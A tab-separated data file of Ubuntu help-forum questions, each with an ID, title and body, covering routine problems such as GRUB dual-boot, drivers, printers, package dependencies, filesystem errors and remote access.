522313	ubuntu 14.04 installation permission denied from hdd & external hdd	title is self explanatory sadly ; had no luck after getting past the security ( for now ) and the same from my samsung external hdd desperate trying to get this to work but no luck except on a virtual machine
522314	i need help to recover my external hard drive , it has been corrupted , please help	i accidentally formatted my external hard drive but i quickly canceled it.. i have not overwritten it that much.. i had about 20gb of storage stored previously.. i used one of the the recovery programs and somehow i was able to restore all my data all the files but they were corrupted ... is there a way to fix those corrupted files ?
522315	byobu changing tabs	when i 'm sharing the same byobu session with multiple users , sometimes when i change the tab , the other user is automatically changed to my new tab , and sometimes he has to do it manually . how can i specify if i want to force the users to change the tab automatically or not ?
522319	acer aspire 6930g	i have problem with ubuntu 14.04 64 bit version . i 've instaled this system on my computer and relesed that my tuba speaker is not working . can some one can tell how to fix this problem ? ?
522320	grub does n't detect my windows 7	it is my first time installing ubuntu ( 14.04 ) . i have windows 7 installed on my first hdd , and installed ubuntu on my second one . to install i followed the instructions on this website : http : //www.linuxbsdos.com/2014/05/31/dual-boot-ubuntu-14-04-windows-7-on-a-pc-with-2-hdds-and-uefi-firmware/ i hit esc during boot and grub only shows ubuntu and advanced options . however if i enter boot menu on my bios i can click on the name of my first hdd and it boots straight to windows . how can i get grub to show my windows 7 ? one more thing which seems wrong : after loading up ubuntu i first get this message : [ 10.040229 ] systemd-undevd [ 343 ] : error calling eviocskeycode : invalid arguments . then it boots normally to my ubuntu log in screen . how can i fix this ? thank you in advance ! : )
522321	issue with running cgminer as a cron job - ubuntu	i have installed cgminer in my machine and could able to start it without any issues when running ./cgminer in terminal . but for a specific feature , i am trying to invoke the cgminer from using shell script via a cron job . the cgminer command executes correctly when i run the shell script but it is not executing when i set the shell script as a cron job . below is the content in the shell script . # ! /bin/bash export display=:0.0 /root/test/cgminer/cgminer/cgminer > > /home/balan/temp/script/log.txt ; please suggest . i used both the below code to setup cron tab * * * * * sh /root/temp/script.sh * * * * * su root -c `` /root/temp/script.sh '' i even tried to see if this is an issue with path setup in a cron job environment , and tried to setup path variable in the shell script as like below . path=/usr/local/rbenv/shims : /usr/local/rbenv/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/balan/local/bin : /home/balan/local/bin : /home/balan/balan/local/bin : /home/balan/local/bin : /home/balan/local/bin ; but its not working as well .
522322	data card not working in ubuntu 14.04	hey this is my first time in ubuntu . can anyone please tell me how to install the huwaei e303f data card . i 've tried installing it as per the manuel but did n't work .
522324	installing ubuntu 14.04 alongside ubuntu 12.04 and windows	i restarted my ubuntu 12.04 today ( after a month or so for which it was continuously on : p ) and it 's not working . i am thinking of installing ubuntu 14.04 along with the currently installed 12.04 and windows for the time being and debug 12.04 later . how should i partition my disk in this case ? i have created an empty partition ( currently unallocated ) of size 100gb . do i need separate swap areas for the 2 versions of ubuntu ?
522325	problems in the installation of ubuntu	when installing ubuntu-14.04.1-desktop-amd64 no selection inauguration beside windows 8.1
522327	unity not coming up / nouveau failed to idle channel 2	first up i am extremely fresh with linux so go easy lol.. after installing ubuntu 14.04 64 bit on my acer aspire the first problem i encounter is a flashing courser it doesnt seem to like being infornt of and windows.. then the os will swtch to the command lie interface and print a report that says something like `` nouveau failed to idle channel 2 '' i found out i needed to update my drivers and i followed the instructions here : http : //howtoubuntu.org/things-to-do-after-installing-ubuntu-14-04-trusty-tahr and selected the `` proprietary tested driver for nvida '' and this seemed to work better . then i found this : ubuntuforums.org/showthread.php ? t=2224675 i liked the idea of the dock so i only followed step 1 and 4 everything went fine untill i restarted , when ubuntu reloaded unity wasnt there i had a mouse but could n't click and `` ctrl atlt t '' didnt work ! i pressed `` ctrl atl f1 '' and got a command line interface so i followed this : itsfoss . com / fix-unity-freezes-after-login-ubuntu-14-04/ it works fine untill i restart and i have to repeat the process because unity is n't there again . i have re installed ubuntu 14.04 and pretty much just want to know how to make it more stable before i start installing things i want ! graphics card : gf108m geforce gt 420m please help
522328	installing ubuntu in dell inspiron already having windows7	after rebooting my computer using a cd , i was asked to give initramfs.what should i do next in order to use ubuntu as soon as possible !
522330	unity launcher made with alacarte iconless	trying to create a launcher with a .png image file and main menu keeps on removing it . is .png not supported or do i need to edit the image first ?
522332	using applications from one linux flavor to another on same pc	i have zorin os alongside ubuntu on my laptop . virtualbox is installed on zorin , i did it from terminal completely . now , is there any way i can use that same virtualbox on ubuntu ? thanks in advance : ) ps : ubuntu 14.04 is my os version . please keep your answers simple , i may have difficulty grasping them as i 'm new to the world of computers .
522334	hplip cartridge not latched	my os is kubuntu 14.04 64bit upgraded yesterday . i get the 1032 error ( tricolor cartridge not latched ) when i try to get hp-levels from terminal . if i align the printer heads , the printer works . in a guest virtuaboxed lubuntu 14.04 , i activate the usb printer from host to guest and it worked . it seems something about hplip . the packages hplip , cups are the same in both os ( host and guest ) , but in virtualized os , kernel is 3.13.0.24 ( where hplip works ! ) , while the host os has got the 3.13.0.33 kernel . reinstalling the hplip and cups debs , not solve the problem . the report is : banco @ banco : ~ $ hp-levels -g hp linux imaging and printing system ( ver . 3.14.3 ) supply levels utility ver . 2.0 copyright ( c ) 2001-13 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . hp-levels [ 2410 ] : debug : getdeviceuri ( none , none , ( 'hp ' , ) , none , , true ) hp-levels [ 2410 ] : debug : mode=0 hp-levels [ 2410 ] : debug : hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj : back_end : hp is_hp : true bus : usb model : deskjet_f4100_series serial : cn77r3s05q04tj dev_file : host : zc : port:1 hp-levels [ 2410 ] : debug : cache miss : deskjet_f4100_series hp-levels [ 2410 ] : debug : reading file : /usr/share/hplip/data/models/models.dat hp-levels [ 2410 ] : debug : searching for section [ deskjet_f4100_series ] in file /usr/share/hplip/data/models/models.dat hp-levels [ 2410 ] : debug : found section [ deskjet_f4100_series ] in file /usr/share/hplip/data/models/models.dat hp-levels [ 2410 ] : debug : { 'hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj ' : [ 'deskjet_f4100 ' ] } using device : hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj hp-levels [ 2410 ] : debug : device uri : hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj hp-levels [ 2410 ] : debug : printer : none hp-levels [ 2410 ] : debug : connecting to com.hplip.statusservice ( try # 1 ) ... hp-levels [ 2410 ] : debug : hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj : back_end : hp is_hp : true bus : usb model : deskjet_f4100_series serial : cn77r3s05q04tj dev_file : host : zc : port:1 hp-levels [ 2410 ] : debug : uri : backend=hp , is_hp=true , bus=usb , model=deskjet_f4100_series , serial=cn77r3s05q04tj , dev= , host= , port=1 hp-levels [ 2410 ] : debug : model/ui model : deskjet_f4100_series/hp deskjet f4100 series hp-levels [ 2410 ] : debug : hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj : back_end : hp is_hp : true bus : usb model : deskjet_f4100_series serial : cn77r3s05q04tj dev_file : host : zc : port:1 hp-levels [ 2410 ] : debug : re-reading cups printer queue information . hp-levels [ 2410 ] : debug : opening device : hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj ( not for printing ) hp-levels [ 2410 ] : debug : i/o mode=6 hp-levels [ 2410 ] : debug : device-id=1 hp-levels [ 2410 ] : debug : opened device : hp ( backend=hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj , is_hp=true , bus=usb , model=deskjet_f4100_series , dev= , serial=cn77r3s05q04tj , host= , port=1 ) hp-levels [ 2410 ] : debug : type 1/2 ( s : or vstatus : ) status hp-levels [ 2410 ] : debug : num_pens = 2 hp-levels [ 2410 ] : debug : pen 0 { 'index ' : 0 , 'kind ' : 3l , 'level ' : 0 , 'level-trigger ' : 1 , 'health ' : 1 , 'type ' : 2 , 'id ' : 24 } hp-levels [ 2410 ] : debug : pen 1 { 'index ' : 1 , 'kind ' : 0l , 'level ' : 15 , 'level-trigger ' : 2 , 'health ' : 1 , 'type ' : 0 , 'id ' : 24 } hp-levels [ 2410 ] : debug : { 'in-tray2 ' : false , 'top-door ' : 1l , 'in-tray1 ' : true , 'agents ' : [ { 'index ' : 0 , 'kind ' : 3l , 'level ' : 0 , 'level-trigger ' : 1 , 'health ' : 1 , 'type ' : 2 , 'id ' : 24 } , { 'index ' : 1 , 'kind ' : 0l , 'level ' : 15 , 'level-trigger ' : 2 , 'health ' : 1 , 'type ' : 0 , 'id ' : 24 } ] , 'photo-tray ' : 0l , 'duplexer ' : 0l , 'supply-door ' : 0l , 'status-code ' : 1032 , 'media-path ' : 2l , 'revision ' : 0 } hp-levels [ 2410 ] : debug : sending event 1032 to hpssd ... hp-levels [ 2410 ] : debug : looking for kind=3 , type=1 ... hp-levels [ 2410 ] : debug : not found : 1 hp-levels [ 2410 ] : debug : looking for kind=3 , type=2 ... hp-levels [ 2410 ] : debug : found : r0-kind3-type2 hp-levels [ 2410 ] : debug : health=1 , level=0 , level_trigger=1 , status_code=1032 hp-levels [ 2410 ] : debug : looking for kind=3 , type=3 ... hp-levels [ 2410 ] : debug : not found : 3 hp-levels [ 2410 ] : debug : { 'cups-printers ' : [ 'deskjet_f4100 ' ] , 'agent1-kind ' : 3l , 'agent1-hp-ink ' : false , 'scan-uri ' : 'hpaio : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj ' , 'is-hp ' : true , 'agent1-level ' : 0 , 'top-door ' : 1l , 'in-tray1 ' : true , 'serial ' : 'cn77r3s05q04tj ' , 'back-end ' : 'hp ' , 'agent1-dvc ' : 0 , 'device-uri ' : 'hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj ' , 'rr ' : '000000 ' , 'photo-tray ' : 0l , 'panel-line1 ' : '' , 'panel-line2 ' : '' , 'port ' : 1 , 'rg ' : '000 ' , 'agent1-known ' : false , 'agent1-health ' : 1 , 'status-code ' : 1032 , 'revision ' : 0 , 'dev-file ' : '' , 'status-desc ' : 'cartridge not latched ' , 'agent1-health-desc ' : 'not installed ' , 'host ' : '' , 'agent1-id ' : 0 , 'error-state ' : 101 , 'device-state ' : 1 , 'panel ' : 0 , 'in-tray2 ' : false , 'agent1-ack ' : false , 'agent1-virgin ' : false , 'agent1-level-trigger ' : 1 , 'rs ' : '000000000 ' , 'agent1-type ' : 2 , 'agent1-desc ' : 'tri-color cartridge ' , 'r ' : 0 , 'deviceid ' : 'mfg : hp ; mdl : deskjet f4100eries ; cmd : ldl , mlc , pml , dyn ; cls : printer ; r ; 1284.4dl:4d,4e,1 ; sn : c7r3r3s05q04tj ; s:80800080000 200202c2c1480000c2500f ; f ; z:007,0a20000 ; ' , 'cups-uri ' : 'hp : /usb/deskjet_f4100_series ? serial=cn77r3s05q04tj ' , 'duplexer ' : 0l , 'supply-door ' : 0l , 'agent1-sku ' : '22 ( c9352a ) ' , 'media-path ' : 2l } hp-levels [ 2410 ] : debug : 1 : agent_type 2 agent_kind 3 agent_sku '22 ( c9352a ) ' tri-color cartridge part no . : 22 ( c9352a ) health : not installed hp-levels [ 2410 ] : debug : closing device ... hp-levels [ 2410 ] : debug : result-code = 0 ******************************* deskjet_f4100_series printer ( cn77r3s05q04tj ) cartridge not latched ( 1032 ) ********************************* kernel 3.13.0-35-generic ********************************** hp linux imaging and printing system ( ver . 3.14.3 ) device information utility ver . 5.2 bye
522335	how to run bootinfoscript from the gparted livecd ?	how to run bootinfoscript from the gparted live cd ? windows 7 on internal hard drive , and linux on an external usb ssd drive ( linux not loaded ) .
522336	having problems with custom keys	well i have a korean samsung notebook from south korea . i had no problems installing the language and i 'm able to type in korean . 안녕~ the problem is that i have a special button that 's called 한영 its the one that changes the english characters to korean and the other way around . so i would like to use the 한영 ( alt+r ) button instead of ctrl + space . i tried by going to the text entry settings and tried to fix it there . but it does n't work ... looked in the web and tried to do something with dconf editor but i could n't do much . since i 'm quite new to linux in general . : s the button 한영 is where it should be alt+r so ubuntu reads it like alt+r witch all the time i press that button takes me to the type command panel that pops up . : /
522339	how to have git and virtualenv aware colors in terminal ?	i am watching `` building web apis with flask '' video on oreilly from miguel grinberg . his terminal is colorful and shows different colors for virtualenv name and git branch name . i want to have the same terminal with the same colors and fonts in my ubuntu 14.04 . how can i do that ? here is a screenshot from one scene of his video :
522342	kernel 3.16 update with bf scheduler	i use an old asus eee pc , and try to boost it up . actually i use the mainline-kernel 3.16 and found out there is a bfs-patch from http : //users.on.net/~ckolivas/kernel/ i want to try bfs instead of cfs because my asus cpu isnt a dual-core . on my research i just found this topic : how can i switch between the cfs and bfs schedulers ? but this topic is outdated , the ppa is closed and the pf-kernel isnt what i am looking for . my problem is , i cant find any good manuals to install the patch . i tried this : patch -p1 < pathofthepatch/patchfile i only get a message , that file on line 5 is missing and the terminal wants me to name a file that i have to patch . ( i dont know what to do here ) .
522343	secondary monitor issues with nvidia laptop in ubuntu 14.04	i 've got a dell xps 15 l502x laptop , with a nvidia geforce gt540m graphics card using the optimus duel system . i 've purchased an external monitor that i can connect with hdmi to act as a second display . it works fine under the duel-booted windows 7 , but i 've been having a lot of problems getting it to work with ubuntu . i have the screens set up with the larger monitor on the left and the smaller laptop on the right . if i try and move my mouse from the monitor to the laptop screen instead of just `` jumping across '' as you would expect the display on the larger monitor instead pans to follow the mouse . this only happens on the larger screen if you move your cursor from left to right . you get a large blue box of `` dead space '' . you ca n't move your cursor there , but for some reason it still counts as part of the desktop . so , for example , if you maximise a window it will expand over the whole area making the top right corner completely inaccessible . it 's hard to explain , so i made this image to try and show what happens . an even worse issue is that windows can still pop-up there and be inaccessible using the mouse . this problem does persist if i set the larger monitor 's resolution to that of the laptop display . so instead of moving from screen to screen the cursor just pans the display between the two . it 's very strange . i think it might be in some way connected to the nvidia graphics card . if i open system settings > screen display it shows both screens in the right positions . but if i open the nvidia x server settings it only recognises , for some reason , the external monitor and not the laptop screen . here 's a screenshot . i ca n't find any information about this , i find it especially odd that it 's recognising the external display but not the built-in one ? any help would be greatly appreciated . all this makes ubuntu pretty much unusable with the second monitor , which is a great shame . especially since it works fine on windows , i 'm going to have to resort to using that to justify the purchase . it 's probably worth noting this occurs whether i 'm using ubuntu unity , gnome 3 or gnome classic ( and there are plenty of other errors i 'm finding trying to use any of them with multiple monitors , this is just the biggest ) . i 'd certainly be open to any suggestions of any other other desktop managers or even different distributions that might work with this setup . after searching around i found nvidia x server settings only shows 1 screen ( laptop + external monitor connected ) which seems to have a similar issue with regards to only one monitor showing up in the nvidia x settings , though no mention of the panning problem . edit : i completely reinstalled ubuntu gnome , then installed the nvidia drivers and lightdm . first time i connected the external monitor it worked perfectly , the two screens were separate . then i restarted and the exact same problem is back , with nothing obviously done to cause it .
522344	i want to switch to ubuntu 12.04 32-bit from a 64-bit without losing data and getting my windows on dual boot damaged	i hope somebody is going t help me out with this . i am a student , so it is my need at present
522349	is it possible to find the host name ( computer name ) in my lan network if i know its ip address ?	i want to know whether this can be achieved using terminal . i have tried nmap , nslookup and netstat , and failed .
522350	cannon printer m 410 printing only landscape	i have an issue with printing portrait in libre office 3.0a . i am using cannon pixma 410 . i have no problem printing portrait any other time that i use the printer but only in libre office . i have read all the posting about how to fix this issue but i have been unable to resolve this . please do n't respond by saying `` this question has been answered before '' . i need someone to really walk me through this , if possible . i am fairly new to linux os . i am using 12.04 lts . thanks in advance .
522351	preparing virtualbox for windows 64bit	i wan na install win8 on virtualbox inside my ubu 12.04 64bit . vbox gave me no option for win8 64bit ( only 32bit available ) when creating a new machine . thus i googled ... on the page : https : //www.virtualbox.org/manual/ch03.html i found : warning : 1 ) you should enable the i/o apic 2 ) make sure that the vm uses the intel networking device questions : q1 ) how do i ( know if i did ) enable i/o apic ? q2 ) how do i know if i have this intel networking device ? thanks for your help ? ... vbox version : 4.3.16 r95972
522354	problem connecting my mac os x to my xubuntu 14.04	i have trouble sharing screen with my new xubuntu 14.04 , a problem that did n't exist with my xubuntu 12.10 . here was the steps i had to go to connect my mac ( 10.8 ) to my xubuntu 12.10 : ssh to my xubuntu machine run 'x11vnc -once -usepw -avahi' on my mac , open finder ( apple-k ) and connect to my to my xubuntu as 'vnc : //' these steps were working perfect until i installed my xubuntu 14.04 . i have noticed a lot of people have trouble with x11vnc but none of the resolutions helped . i used 'ssh -x ' but the experience is not as good as connection through vnc . is there a resolution ? is there some security/config setting i have to do on my xubuntu ? is the above command different now on 14.04 . i have been scanning these threads for a while to find a suitable solution without much luck . any help is greatly appreciated .
522358	transfer files from maintenance shell	i am running ubuntu 14.04 . i attempted to boot my computer and i received the following error : general error mounting filesystems . a maintenance shell will now be started . control-d will terminate this shell and reboot the system since the computer wo n't boot , i need to transfer for files . i can access the files from the command line but i ca n't teansfer any files . i tried to mount the usb drive but the 'mount ' is not installed . i then used rsync -avh /dev/sdb /media/usb error message : rsync : mknod `` /media/usb '' failed : read-only file system ( 30 ) i am not tied to this method . i just need to transfer my files . any assistance would be appreciated .
522360	ubuntu 14.04 unmet dependencies . try 'apt-get -f install ' with no packages	i am trying to install build essential packages on amazon ec2 instance having ubuntu 14.04 . it does n't have some essential packages which comes in normal ubuntu desktop edition.every time i try to install any package with command : sudo apt-get -f install build-essential i am getting same dependency error . i was trying to install perl modules required for my application . i might have messed up with package manager by trying some commands such as clean . why does build-essentials require perl ? is my package repository corrupted ? can i start from fresh or any other solution ? thanks in advance . error reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : build-essential : depends : libc6-dev but it is not going to be installed or libc-dev depends : gcc ( > = 4:4.4.3 ) but it is not going to be installed depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed depends : make but it is not going to be installed depends : dpkg-dev ( > = 1.13.5 ) but it is not going to be installed libapparmor-perl : depends : perl-base ( > = 5.18.2-2ubuntu1 ) but 5.14.2-21build1 is to be installed depends : perlapi-5.18.2 libdbd-mysql-perl : depends : perlapi-5.18.1 libdbi-perl : depends : perlapi-5.18.1 liblocale-gettext-perl : predepends : perl-base ( > = 5.18.1-4 ) but 5.14.2-21build1 is to be installed predepends : perlapi-5.18.1 liblwp-protocol-https-perl : depends : libio-socket-ssl-perl ( > = 1.54 ) but 1.31-1 is to be installed depends : libnet-http-perl but it is not going to be installed depends : libwww-perl ( > = 6.05-2 ) but it is not going to be installed libsub-name-perl : depends : perlapi-5.18.1 libterm-readkey-perl : depends : perlapi-5.18.1 libtext-charwidth-perl : depends : perl-base ( > = 5.18.1-4 ) but 5.14.2-21build1 is to be installed depends : perlapi-5.18.1 libtext-iconv-perl : depends : perl-base ( > = 5.18.1-4 ) but 5.14.2-21build1 is to be installed depends : perlapi-5.18.1 libtext-soundex-perl : depends : perlapi-5.18.1 perl : depends : perl-base ( = 5.18.2-2ubuntu1 ) but 5.14.2-21build1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
522362	collision of keybindings	i 'm using currently sublime text 3 . i 've noticed that when i try to use some default keyboard shortcut , such as ctrl+l for example , nothings happen . i assume that some of systems keyboard shortcut overrides it . is there any way to force ubuntu to check for the current window shortcuts first , rather ten system ones ?
522363	computer boots to grub command line	i 've three hard drives with windows 8.1.1 installed on the first ssd and then ubuntu 14.04.1 lts on the third hdd . in bios i 've chosen to launch 1. ubuntu 2. ubuntu 3 . windows boot manager 4 . windows boot manager ( why there are two entries for each one , i do n't know ) . but when i start the computer i get to a big black command window . if i there type exit it then launches past the msi efi screen and over to the `` normal '' grub screen with the ability to choose either ubuntu or windows 8 . why 's there that it launches to the command line at first requiring me to type exit before actually launching the system ? some extra info : i 've grub2 . boot repair tells me there was an error quoting '' an error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/8309104/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . please do not forget to make your bios boot on sdc ( 500gb ) disk ! '' hope that helps . also i do not have any option to boot from sdc rather than just that i want to boot ubuntu or windows as seen in my bios here : https : //www.dropbox.com/sh/qpg799h38az76gv/aabhge1iknq7sfxdlgesfnhna ? dl=0 thanks in advance ! ( ps . as you may notice i 'm relatively new to ubuntu , though i 've had it as my primary os before for a while on my laptop , but i 'm not into all commands and such so take it easy on me ds . )
522364	i can not change my desktop	i am using ubuntu 14.04. i installed cinnamon and later deleted it.after that i cant change my desktop again . when i right click on the desktop it does n't work .
522365	orphaned inodes on root file system ( ext4 ) ; persistent problem	on my trusty systems ( vms under vmware , desktops , and laptops ) , we have the following issue . the root file system seems to have inodes that are never marked as `` free '' . after a month of a working server the `` df -i '' show a 100 % usage of inodes on / ( an ext4 fs ) . doing a preview fsck shows errors . we do a `` touch /forcefsck '' , and reboot the system . this correct orphaned inodes , but the problem appears again . there is no messages on /var/log/syslog . what 's wrong ? the systems are up to date with the latest update and kernel availables on trusty . # fsck -nf / fsck from util-linux 2.20.1 e2fsck 1.42.9 ( 4-feb-2014 ) warning ! /dev/mapper/sys -- vg-root is mounted . warning : skipping journal recovery because doing a read-only filesystem check . pass 1 : checking inodes , blocks , and sizes deleted inode 395860 has zero dtime . fix ? no inodes that were part of a corrupted orphan linked list found . fix ? no inode 395869 was part of the orphaned inode list . ignored . inode 395871 was part of the orphaned inode list . ignored . inode 395872 was part of the orphaned inode list . ignored . inode 395873 was part of the orphaned inode list . ignored . inode 395874 was part of the orphaned inode list . ignored . inode 395875 was part of the orphaned inode list . ignored . inode 395877 was part of the orphaned inode list . ignored . inode 395878 was part of the orphaned inode list . ignored . pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information block bitmap differences : -1606447 - ( 1606994 -- 1606995 ) -1606998 -1607063 -1607094 -1607128 -1607232 -1607687 fix ? no free blocks count wrong ( 2346388 , counted=2345410 ) . fix ? no inode bitmap differences : -395860 -395869 - ( 395871 -- 395875 ) - ( 395877 -- 395878 ) fix ? no free inodes count wrong ( 662804 , counted=662787 ) . fix ? no /dev/mapper/sys -- vg-root : ********** warning : filesystem still has errors ********** /dev/mapper/sys -- vg-root : 107244/770048 files ( 0.1 % non-contiguous ) , 730732/3077120 blocks
522366	mounting the network path does not work	i have mounted a network location in my ubuntu server in the fstab entry , but it does not get mounted anymore . it has been working all the time and i have used the path to automatically back up my files to that location . i have tried sudo mount -a. i can see the folder visible in the file browser but i can not access it . here is the fstab entry : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/miracledc -- vg-root / ext4 e $ # /boot was on /dev/sda1 during installation uuid=e1be2c05-070e-4a93-9deb-c65c1bda5d63 /boot ext2 defaults 0 2 /dev/mapper/m $ /dev/miracledc-vg/root / ext4 noauto 0 0 # /dev/sdb /media/miracle / ntfs defaults 0 2 uuid=d01275f9-368d-446e-b100-044e5b071224 /media/hdd2 ext4 user $ //192.168.2.3/miracle /media/miracle cifs username=administrator , password=miracleadventure , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0
522368	wo n't login to trusty after moving home to a new partition	i 've been following the second answer on question how to transfer ssd but keeping home on hdd . now i can boot up fine from ssd . however , when i try to login with my correct password after the screen shows my user & asks for the password , the screen does not say `` incorrect password '' but nothing happens . when i try to login with an incorrect password , the screen does say `` incorrect password '' as expected . the same results also occur if i try to boot up from my hdd . any idea as to the problem ( s ) & solution ? i noted ( on subsequent boot from a live media usb stick ) that a /home directory is also created on both the sdd & hdd partition for mount point / . ps i have n't used the line '' uuid=063a996a-0303-42b2-b719-af920fd105fa /home/ $ your_username ext4 relatime , acl 0 2 '' in either the sssd or the hdd /etc/fstab but instead used `` uuid= ? ? ? ? ? ? ? ? /home ext4 defaults 0 2 '' . i understand that trusty now sets relatime by default . also , i do n't see how this would affect login .
522371	how to run mathematica on remote server	i am using ubuntu 14.04 and have connected to a remote server using ssh . i would like to run mathematica 8 which is installed on the server . when i type mathematica in the terminal , it says ca n't open display `` '' . what should i do to run it ?
522372	installing 32-bit libraries on ubuntu 14.04 lts 64-bit	basically simple question : is it possible to install 32-bit libraries on my 64-bit ubuntu 14.04 lts box ? i need to run an app which requires 32-bit support . the information found on this forum is all about older versions , and i as not able to filter out all static . if those libraries are still supported , how do i then get those installed on my box ? so far what i tried only led to errors like `` package 'ia32-libs ' has no installation candidate '' or `` failed to fetch '' .
522375	`` rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.5 '' '' while starting mysql	i have a mysql that has been working fine but now will not start . all i 've been able to accomplish is using sudo start mysql which generates the following error : start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.5 '' ( uid=1000 pid=1678 comm= '' start mysql `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) i 've tried googling sections of it , but it seems this is basically a useless error . anyway i can get more information about what is going on ?
522378	ubuntu and bioinformatics	why ubuntu operating system was proposed for bioinformatics jobs ? in references books it suggesting without giving a reason . i am newbie to ubuntu and i did n't use that before .
522380	why the programs do n't connect to internet except for the browser ?	i solved a problem of getting a `` dns resolving failed '' in my computer , now i can surf through internet with the browser without problems but programs , such as : dropbox , spotify , mendeley desktop does n't connect to internet . do you know what could be the problem ? moreover , when i try to restart the network with sudo /etc/init.d/networking force-reload does n't finish to process the command . thanks in advance !
522381	connect to internet vai wifi on ubuntu 12.04 on laptop leveno g50-70	i have purchased lenovo g5-70 laptop and installed ubuntu 12.04 ( 64 bit ) on it now i am not able to connect via wifi connection .
522382	web server is down , only have ssh access	my ubuntu web server is down and my client is going nuts ! ! unfortunately i can not get hold of the guy that manages all our servers . i do have full ssh access , but can only get this far : user : ~ me $ ssh user @ webserver.com -vvv openssh_6.2p2 , osslshim 0.9.8r 8 dec 2011 debug1 : reading configuration data /etc/ssh_config debug1 : /etc/ssh_config line 20 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to webserver.com [ ip.address ] port 22. debug1 : connection established . debug1 : identity file /users/james/.ssh/id_rsa type -1 debug1 : identity file /users/james/.ssh/id_rsa-cert type -1 debug1 : identity file /users/james/.ssh/id_dsa type -1 debug1 : identity file /users/james/.ssh/id_dsa-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.2 but it hangs here and goes no further . is there any command i can send to force the server to reboot ? many thanks thanks for all the help . i did manage to get hold of the server guy and a simple restart solved everything ... if only i had the ability to do that myself then 25hours of downtime would have been avoided. ! ! !
522385	is it possible to run the desktop softwares on ubuntu touch ?	i have a tablet ( not rooted currently , but can be , if needed ) . the specs are as follows : - > 1.5 ghz dual core cortex a9 , 1 gb ram and 2 gb internal memory with sd card support . runs on android 4.1 . 1 , usb otg my requirements are as follows : i am college student and would like to run softwares that i normally run on pc , such as the ide ( eclipse etc ) and eda simulation tools if possible ubuntu touch is preferred . recently i heard of 2 projects : linux on android and ubuntu touch now my query is , is it possible to run the desktop softwares on ubuntu touch ? it would be great if i could run various ide and eda simulation tools on ubuntu touch without added hardware etc ( apart from keyboard and mouse ) . how about linux on android project ? can it fulfil my needs ? take into account that since my internal storage is small , i will need to install software on sd card . is it supported ?
522386	asus eee wo n't boot	i have a asus eee pc running ubuntu but i wanted to change to lubuntu , so i created a bootable usb pen drive with lubuntu ( that works fine , i tryed it no my desktop ) . i was able to boot on my eee pc and got to the part to manage the partitions . i deleted all partitions because i wanted to have only lubuntu running but then accidently i unplugged my computer and now i ca n't boot from the usb pen . it just boots into ubuntu log in page and after i login nothing happens . i 've tryed reinstalling ubuntu-desktop but it wont install . i know everything is right with my usb pen and bootable device priority on bios . what can i do to install lubuntu .
522387	-std=c++11 not recognized on gcc 4.8.1	i just followed an answer to this question to update my gcc version to 4.8 . 1 on ubuntu 12.04 , which i thought would support c++11 . however it does not seem to . when i try to compile something with -std=c++11 flag , i get this error : cc1plus : error : unrecognized command line option â-std=c++11â my gcc version is this : gcc version 4.8.1 ( ubuntu 4.8.1-2ubuntu1~12.04 ) my g++ version is this : $ g++ -v ... . gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) what could i be missing ? edit : i was missing that i needed to update g++ it is easily achieved with a small modification to the code provided in the above mentioned answer . just change gcc to g++ . sudo apt-get install python-software-properties sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install g++-4.8 sudo update-alternatives -- install /usr/bin/g++ g++ /usr/bin/g++-4.8 50
522388	ubuntu gnome hanging	i have a dell dimension pc that was running windows xp , i recently got a virus on it which crashed my hard drive . now when i switch the pc on it shows the dell splash page and then the screen goes blank . i wanted to boot ubuntu on it to see if i can recover any of my files . i put ubuntu gnome on a 1gb usb drive and tried booting it . it boots and gets to the screen with the gnome foot logo and flashing 3circles . it then freezes at this screen . i tried booting a different pc with the same usb and it worked fine . so the install on the usb seems okay . does anyone know why this may be happening ? thanks adam .
